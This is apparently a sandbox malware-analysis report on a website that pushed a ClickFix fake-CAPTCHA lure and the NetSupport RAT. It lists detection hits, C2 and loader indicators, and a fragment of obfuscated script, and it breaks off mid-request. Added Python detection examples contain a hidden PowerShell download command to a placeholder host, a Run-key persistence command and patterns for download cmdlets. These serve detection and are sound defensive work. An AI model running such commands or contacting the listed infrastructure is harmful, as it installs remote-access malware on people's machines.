Windows Analysis Report
http://www.focuslight.com/

General Information

Sample URL: http://www.focuslight.com/
Analysis ID: 1700159
Infos: yarasigma

Detection

NetSupport RAT, CAPTCHA Scam ClickFix
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Detect drive by download via clipboard copy & paste
Multi AV Scanner detection for dropped file
Sigma detected: Powershell drops NetSupport RAT client
Suricata IDS alerts for network traffic
Yara detected CAPTCHA Scam ClickFix
HTML page adds suspicious text to clipboard
HTML page contains obfuscated javascript
NDIS Filter Driver detected (likely used to intercept and sniff network traffic)
Powershell drops PE file
Sample is not signed and drops a device driver
Sigma detected: Suspicious Invoke-WebRequest Execution
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Drops PE files
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Invalid T&C link found
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool
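The host-side signatures above (PowerShell web download, a PE dropped from PowerShell, a Run key written with reg.exe, NetSupport's client32.exe started from the user profile) only become a conviction when they are tied to the same process tree. The following is an added example, not part of the Joe Sandbox report, that replays that correlation over constructed process-creation events. The event fields (pid, ppid, image, cmdline) are modelled on Sysmon Event ID 1, the reg.exe and PowerShell command lines are assumptions written for illustration, and only the drop path C:\Users\user\AppData\Roaming\Directory\client32.exe is taken from the report.

```python
"""Correlate ClickFix -> PowerShell -> NetSupport host signatures over process events.

Added example: the events below are constructed (Sysmon Event ID 1 style), the
command lines are illustrative, and the URL example.invalid is a placeholder.
"""
import re
from typing import Dict, Iterator, List, Tuple

Event = Dict[str, object]

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
# File names NetSupport Manager ships with; the report lists client32.exe and remcmdstub.exe.
NETSUPPORT_FILES = {"client32.exe", "remcmdstub.exe", "pcicl32.dll", "htctl32.dll", "pcicapi.dll"}
WEB_DOWNLOAD = re.compile(
    r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|Net\.WebClient|DownloadString|DownloadFile|Start-BitsTransfer)\b",
    re.IGNORECASE,
)
REG_ADD = re.compile(r"\breg(\.exe)?\s+add\b", re.IGNORECASE)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\b", re.IGNORECASE)
APPDATA_ROAMING = re.compile(r"\\AppData\\Roaming\\", re.IGNORECASE)

# Constructed events. ppid 700 stands for explorer.exe (Win+R paste); no event for it is included.
SAMPLE_EVENTS: List[Event] = [
    dict(pid=1001, ppid=800, image=r"C:\Program Files\Google\Chrome\Application\chrome.exe",
         cmdline="chrome.exe https://www.focuslight.com/"),
    dict(pid=1200, ppid=700, image=r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
         cmdline='powershell -w hidden -c "Invoke-WebRequest -Uri https://example.invalid/x -OutFile $env:TEMP\\x.zip"'),
    dict(pid=1300, ppid=1200, image=r"C:\Windows\System32\reg.exe",
         cmdline=r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Directory /t REG_SZ /d "C:\Users\user\AppData\Roaming\Directory\client32.exe"'),
    dict(pid=1400, ppid=1200, image=r"C:\Users\user\AppData\Roaming\Directory\client32.exe",
         cmdline="client32.exe"),
    # Benign noise: an unrelated reg.exe query must not fire the Run-key rule.
    dict(pid=1500, ppid=700, image=r"C:\Windows\System32\reg.exe",
         cmdline=r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion"),
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(events: List[Event]) -> List[Tuple[str, int]]:
    """Apply the per-event rules; returns (rule_name, pid) pairs in event order."""
    findings: List[Tuple[str, int]] = []
    for e in events:
        img, cmd, pid = basename(str(e["image"])), str(e["cmdline"]), int(e["pid"])
        if img in POWERSHELL_IMAGES and WEB_DOWNLOAD.search(cmd):
            findings.append(("powershell_web_download", pid))
        if img == "reg.exe" and REG_ADD.search(cmd) and RUN_KEY.search(cmd):
            findings.append(("run_key_via_reg", pid))
        if img in NETSUPPORT_FILES and APPDATA_ROAMING.search(str(e["image"])):
            findings.append(("netsupport_client_in_appdata", pid))
    return findings


def ancestors(pid: int, by_pid: Dict[int, Event]) -> Iterator[int]:
    """Walk ppid links upward until the parent is unknown; guards against pid cycles."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        pid = int(by_pid[pid]["ppid"])
        yield pid


def correlate(events: List[Event]) -> Dict[str, object]:
    """Chain persistence and RAT-start findings back to a downloading PowerShell ancestor."""
    by_pid = {int(e["pid"]): e for e in events}
    findings = evaluate(events)
    downloaders = {pid for rule, pid in findings if rule == "powershell_web_download"}
    chained = sorted({
        pid for rule, pid in findings
        if rule != "powershell_web_download" and any(a in downloaders for a in ancestors(pid, by_pid))
    })
    if chained:
        verdict = "clickfix_netsupport_chain"
    elif findings:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"findings": findings, "chained_pids": chained, "verdict": verdict}


if __name__ == "__main__":
    print(correlate(SAMPLE_EVENTS))
```

The individual rules are noisy on their own (administrators run Invoke-WebRequest, installers write Run keys); the parent-chain requirement in correlate() is what turns three medium-confidence hits into one high-confidence verdict, which mirrors why the sandbox weights "Powershell drops NetSupport RAT client" as a Sigma match rather than a generic PowerShell alert.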

Classification

AV Detection

Source: C:\Users\user\AppData\Roaming\Directory\client32.exe ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Roaming\Directory\remcmdstub.exe ReversingLabs: Detection: 16%

Phishing

Source: Yara match File source: 0.2.pages.csv, type: HTML
Source: https://ace-project.org/d.js HTTP Parser: (function(_0x56c4d6,_0x1184e4){const _0x47dcd9=_0x11e7,_0x1961fe=_0x56c4d6();while(!![]){try{const _
Source: https://www.focuslight.com/ HTTP Parser: Invalid link: Privacy Statement
Source: https://www.focuslight.com/ HTTP Parser: No favicon
Source: https://www.focuslight.com/ HTTP Parser: No <meta name="author".. found
Source: https://www.focuslight.com/ HTTP Parser: No <meta name="copyright".. found
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Directory\msvcr100.dll
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 141.193.213.10:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown HTTPS traffic detected: 141.193.213.10:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: client32.exe, 0000001D.00000002.2023427992.0000000070142000.00000002.00000001.01000000.0000000F.sdmp, client32.exe, 00000021.00000002.1892321802.0000000070142000.00000002.00000001.01000000.0000000F.sdmp, client32.exe, 00000022.00000002.1974260328.0000000070142000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: msvcr100.i386.pdb source: client32.exe, 0000001D.00000002.2022808297.0000000070051000.00000020.00000001.01000000.0000000D.sdmp, client32.exe, 00000021.00000002.1892063645.0000000070051000.00000020.00000001.01000000.0000000D.sdmp, client32.exe, 00000022.00000002.1974000969.0000000070051000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.28.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 0000001D.00000002.2021848504.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000021.00000002.1891623943.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000022.00000002.1973644487.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, PCICL32.DLL.28.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: client32.exe, 0000001D.00000002.2022624501.000000006C090000.00000002.00000001.01000000.00000010.sdmp, HTCTL32.DLL.28.dr
Source: Binary string: g:\workspace\wsk\divert\install\WDDK\amd64\itvwd64.pdb source: powershell.exe, 0000001C.00000002.1759185059.0000000004FE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1759185059.0000000004E74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1759185059.0000000004E53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1759185059.0000000004F2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1759185059.000000000509B000.00000004.00000800.00020000.00000000.sdmp, itvwd64.sys4.28.dr, itvwd64.sys.28.dr, itvwd64.sys0.28.dr, itvwd64.sys2.28.dr
Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 0000001D.00000000.1763409289.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000001D.00000002.2019779438.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000021.00000000.1888686094.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000021.00000002.1890861207.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000022.00000002.1973402402.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000022.00000000.1969236658.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, client32.exe.28.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: client32.exe, 0000001D.00000002.2022624501.000000006C090000.00000002.00000001.01000000.00000010.sdmp, HTCTL32.DLL.28.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 0000001C.00000002.1759185059.000000000520A000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000001D.00000002.2023193636.0000000070125000.00000002.00000001.01000000.0000000E.sdmp, client32.exe, 00000021.00000002.1892228410.0000000070125000.00000002.00000001.01000000.0000000E.sdmp, client32.exe, 00000022.00000002.1974174646.0000000070125000.00000002.00000001.01000000.0000000E.sdmp, pcicapi.dll.28.dr
Source: Binary string: C:\buildslave\goldsrc_win32\build\GoldSrc\engine\GL_Release_STEAM\hw.pdb@ source: hw.dll.28.dr
Source: Binary string: C:\buildslave\goldsrc_win32\build\GoldSrc\engine\GL_Release_STEAM\hw.pdb source: hw.dll.28.dr

Networking

Source: Network traffic Suricata IDS: 2061991 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (ace-project .org) : 192.168.2.4:64780 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2061991 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (ace-project .org) : 192.168.2.4:52899 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2061994 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in TLS SNI (ace-project .org) : 192.168.2.4:49741 -> 162.214.153.12:443
Source: Network traffic Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.4:49762 -> 5.252.178.123:443
Source: Network traffic Suricata IDS: 2035894 - Severity 1 - ET MALWARE NetSupport RAT with System Information : 192.168.2.4:49762 -> 5.252.178.123:443
Source: itvwd64.sys.28.dr Static PE information: Found NDIS imports: FwpsInjectionHandleDestroy0, FwpsInjectionHandleCreate0, FwpmTransactionCommit0, FwpsInjectNetworkSendAsync0, FwpmCalloutAdd0, FwpmSubLayerDeleteByKey0, FwpsQueryPacketInjectionState0, FwpmFilterDeleteByKey0, FwpmCalloutDeleteByKey0, FwpsFlowRemoveContext0, FwpsInjectNetworkReceiveAsync0, FwpmSubLayerAdd0, FwpsCalloutUnregisterByKey0, FwpsFlowAssociateContext0, FwpsAllocateNetBufferAndNetBufferList0, FwpsFreeNetBufferList0, FwpmEngineClose0, FwpmTransactionBegin0, FwpmFilterAdd0, FwpmProviderDeleteByKey0, FwpmEngineOpen0, FwpmTransactionAbort0, FwpsCalloutRegister0, FwpmProviderAdd0, FwpsInjectForwardAsync0
Source: itvwd64.sys0.28.dr Static PE information: Found NDIS imports: FwpsInjectionHandleDestroy0, FwpsInjectionHandleCreate0, FwpmTransactionCommit0, FwpsInjectNetworkSendAsync0, FwpmCalloutAdd0, FwpmSubLayerDeleteByKey0, FwpsQueryPacketInjectionState0, FwpmFilterDeleteByKey0, FwpmCalloutDeleteByKey0, FwpsFlowRemoveContext0, FwpsInjectNetworkReceiveAsync0, FwpmSubLayerAdd0, FwpsCalloutUnregisterByKey0, FwpsFlowAssociateContext0, FwpsAllocateNetBufferAndNetBufferList0, FwpsFreeNetBufferList0, FwpmEngineClose0, FwpmTransactionBegin0, FwpmFilterAdd0, FwpmProviderDeleteByKey0, FwpmEngineOpen0, FwpmTransactionAbort0, FwpsCalloutRegister0, FwpmProviderAdd0, FwpsInjectForwardAsync0
Source: itvwd64.sys1.28.dr Static PE information: Found NDIS imports: FwpsInjectionHandleDestroy0, FwpsInjectionHandleCreate0, FwpmTransactionCommit0, FwpsInjectNetworkSendAsync0, FwpmCalloutAdd0, FwpmSubLayerDeleteByKey0, FwpsQueryPacketInjectionState0, FwpmFilterDeleteByKey0, FwpmCalloutDeleteByKey0, FwpsFlowRemoveContext0, FwpsInjectNetworkReceiveAsync0, FwpmSubLayerAdd0, FwpsCalloutUnregisterByKey0, FwpsFlowAssociateContext0, FwpsAllocateNetBufferAndNetBufferList0, FwpsFreeNetBufferList0, FwpmEngineClose0, FwpmTransactionBegin0, FwpmFilterAdd0, FwpmProviderDeleteByKey0, FwpmEngineOpen0, FwpmTransactionAbort0, FwpsCalloutRegister0, FwpmProviderAdd0, FwpsInjectForwardAsync0
Source: itvwd64.sys2.28.dr Static PE information: Found NDIS imports: FwpsInjectionHandleDestroy0, FwpsInjectionHandleCreate0, FwpmTransactionCommit0, FwpsInjectNetworkSendAsync0, FwpmCalloutAdd0, FwpmSubLayerDeleteByKey0, FwpsQueryPacketInjectionState0, FwpmFilterDeleteByKey0, FwpmCalloutDeleteByKey0, FwpsFlowRemoveContext0, FwpsInjectNetworkReceiveAsync0, FwpmSubLayerAdd0, FwpsCalloutUnregisterByKey0, FwpsFlowAssociateContext0, FwpsAllocateNetBufferAndNetBufferList0, FwpsFreeNetBufferList0, FwpmEngineClose0, FwpmTransactionBegin0, FwpmFilterAdd0, FwpmProviderDeleteByKey0, FwpmEngineOpen0, FwpmTransactionAbort0, FwpsCalloutRegister0, FwpmProviderAdd0, FwpsInjectForwardAsync0
Source: itvwd64.sys3.28.dr Static PE information: Found NDIS imports: FwpsInjectionHandleDestroy0, FwpsInjectionHandleCreate0, FwpmTransactionCommit0, FwpsInjectNetworkSendAsync0, FwpmCalloutAdd0, FwpmSubLayerDeleteByKey0, FwpsQueryPacketInjectionState0, FwpmFilterDeleteByKey0, FwpmCalloutDeleteByKey0, FwpsFlowRemoveContext0, FwpsInjectNetworkReceiveAsync0, FwpmSubLayerAdd0, FwpsCalloutUnregisterByKey0, FwpsFlowAssociateContext0, FwpsAllocateNetBufferAndNetBufferList0, FwpsFreeNetBufferList0, FwpmEngineClose0, FwpmTransactionBegin0, FwpmFilterAdd0, FwpmProviderDeleteByKey0, FwpmEngineOpen0, FwpmTransactionAbort0, FwpsCalloutRegister0, FwpmProviderAdd0, FwpsInjectForwardAsync0
Source: itvwd64.sys4.28.dr Static PE information: Found NDIS imports: FwpsInjectionHandleDestroy0, FwpsInjectionHandleCreate0, FwpmTransactionCommit0, FwpsInjectNetworkSendAsync0, FwpmCalloutAdd0, FwpmSubLayerDeleteByKey0, FwpsQueryPacketInjectionState0, FwpmFilterDeleteByKey0, FwpmCalloutDeleteByKey0, FwpsFlowRemoveContext0, FwpsInjectNetworkReceiveAsync0, FwpmSubLayerAdd0, FwpsCalloutUnregisterByKey0, FwpsFlowAssociateContext0, FwpsAllocateNetBufferAndNetBufferList0, FwpsFreeNetBufferList0, FwpmEngineClose0, FwpmTransactionBegin0, FwpmFilterAdd0, FwpmProviderDeleteByKey0, FwpmEngineOpen0, FwpmTransactionAbort0, FwpsCalloutRegister0, FwpmProviderAdd0, FwpsInjectForwardAsync0
Source: Network traffic Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49760 -> 141.193.213.10:443
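The Suricata alerts above carry the indicators that matter for blocking and hunting: the ZPHP/ClickFix loader domain (defanged by the rule author as "ace-project .org"), the TLS endpoint it resolved to, and the NetSupport C2 at 5.252.178.123:443. The following is an added example, not part of the Joe Sandbox report, that parses the alert lines exactly as they appear in this section, re-fangs the domain, and separates C2 endpoints from loader infrastructure. The alert lines are copied from this report; the line format regex and the category heuristics (MALWARE vs EXPLOIT_KIT keywords in the rule message) are assumptions of the example.

```python
"""Turn Joe Sandbox "Network traffic Suricata IDS" lines into an IOC summary.

Added example. The six alert lines are copied from this report; the parsing
regex and the MALWARE/EXPLOIT_KIT classification are the example's own.
"""
import re
from typing import Dict, List, Optional

REPORT_ALERTS = [
    "Source: Network traffic Suricata IDS: 2061991 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (ace-project .org) : 192.168.2.4:64780 -> 1.1.1.1:53",
    "Source: Network traffic Suricata IDS: 2061991 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (ace-project .org) : 192.168.2.4:52899 -> 1.1.1.1:53",
    "Source: Network traffic Suricata IDS: 2061994 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in TLS SNI (ace-project .org) : 192.168.2.4:49741 -> 162.214.153.12:443",
    "Source: Network traffic Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.4:49762 -> 5.252.178.123:443",
    "Source: Network traffic Suricata IDS: 2035894 - Severity 1 - ET MALWARE NetSupport RAT with System Information : 192.168.2.4:49762 -> 5.252.178.123:443",
    "Source: Network traffic Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49760 -> 141.193.213.10:443",
]

ALERT_RE = re.compile(
    r"Suricata IDS: (?P<sid>\d+) - Severity (?P<sev>\d+) - (?P<msg>.+?) : "
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3}):(?P<sport>\d+) -> "
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3}):(?P<dport>\d+)\s*$"
)
# Emerging Threats defangs domains in rule names as "(label .tld)"; undo that for the IOC list.
DEFANGED_DOMAIN = re.compile(r"\(([A-Za-z0-9-]+) \.([A-Za-z0-9.-]+)\)")


def parse_alert(line: str) -> Optional[Dict[str, object]]:
    """Parse one report line; returns None for lines that are not Suricata alerts."""
    m = ALERT_RE.search(line)
    if not m:
        return None
    a: Dict[str, object] = m.groupdict()
    for key in ("sid", "sev", "sport", "dport"):
        a[key] = int(str(a[key]))
    a["domains"] = [f"{label}.{tld}" for label, tld in DEFANGED_DOMAIN.findall(str(a["msg"]))]
    return a


def extract_iocs(lines: List[str]) -> Dict[str, object]:
    """Deduplicated domains, C2 and loader endpoints, rule SIDs and a severity histogram."""
    alerts = [a for a in (parse_alert(l) for l in lines) if a]
    domains, c2, exploit_kit, sids = set(), set(), set(), set()
    by_severity: Dict[int, int] = {}
    for a in alerts:
        sids.add(int(str(a["sid"])))
        sev = int(str(a["sev"]))
        by_severity[sev] = by_severity.get(sev, 0) + 1
        domains.update(a["domains"])  # type: ignore[arg-type]
        if int(str(a["dport"])) == 53:
            continue  # DNS alerts point at the resolver (1.1.1.1), not at attacker infrastructure
        endpoint = (str(a["dst"]), int(str(a["dport"])))
        msg = str(a["msg"])
        if "MALWARE" in msg:
            c2.add(endpoint)
        elif "EXPLOIT_KIT" in msg:
            exploit_kit.add(endpoint)
    return {
        "domains": sorted(domains),
        "c2": sorted(c2),
        "exploit_kit": sorted(exploit_kit),
        "sids": sorted(sids),
        "by_severity": by_severity,
    }


if __name__ == "__main__":
    for k, v in extract_iocs(REPORT_ALERTS).items():
        print(f"{k}: {v}")
```

Keeping the DNS alerts out of the endpoint lists is deliberate: the destination of SID 2061991 is the sandbox's resolver, and blocking it would do nothing against the campaign, whereas the SNI alert and the two NetSupport alerts name hosts worth sinkholing.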
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 84.201.221.37
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 84.201.221.37
Source: unknown TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 74.125.137.94
Source: unknown TCP traffic detected without corresponding DNS query: 74.125.137.94
Source: unknown TCP traffic detected without corresponding DNS query: 74.125.137.94
Source: unknown TCP traffic detected without corresponding DNS query: 74.125.137.94
Source: unknown TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: global traffic HTTP traffic detected: GET / HTTP/1.1
    host: www.focuslight.com
    upgrade-insecure-requests: 1
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    sec-fetch-site: none
    sec-fetch-mode: navigate
    sec-fetch-user: ?1
    sec-fetch-dest: document
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=0, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/en_css/owl.carousel.min.css HTTP/1.1
    host: www.focuslight.com
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: text/css,*/*;q=0.1
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: style
    referer: https://www.focuslight.com/
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=0
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/en_css/animate.min.css HTTP/1.1
    host: www.focuslight.com
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: text/css,*/*;q=0.1
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: style
    referer: https://www.focuslight.com/
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=0
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/en_css/public.css?v=1 HTTP/1.1
    host: www.focuslight.com
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: text/css,*/*;q=0.1
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: style
    referer: https://www.focuslight.com/
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=0
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/en_js/jquery-3.6.0.min.js HTTP/1.1
    host: www.focuslight.com
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://www.focuslight.com/
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=1
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/en_js/owl.carousel.min.js HTTP/1.1
    host: www.focuslight.com
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://www.focuslight.com/
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=1
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/en_js/public.js HTTP/1.1
    host: www.focuslight.com
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://www.focuslight.com/
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=1
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/en_js/wow.min.js HTTP/1.1
    host: www.focuslight.com
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
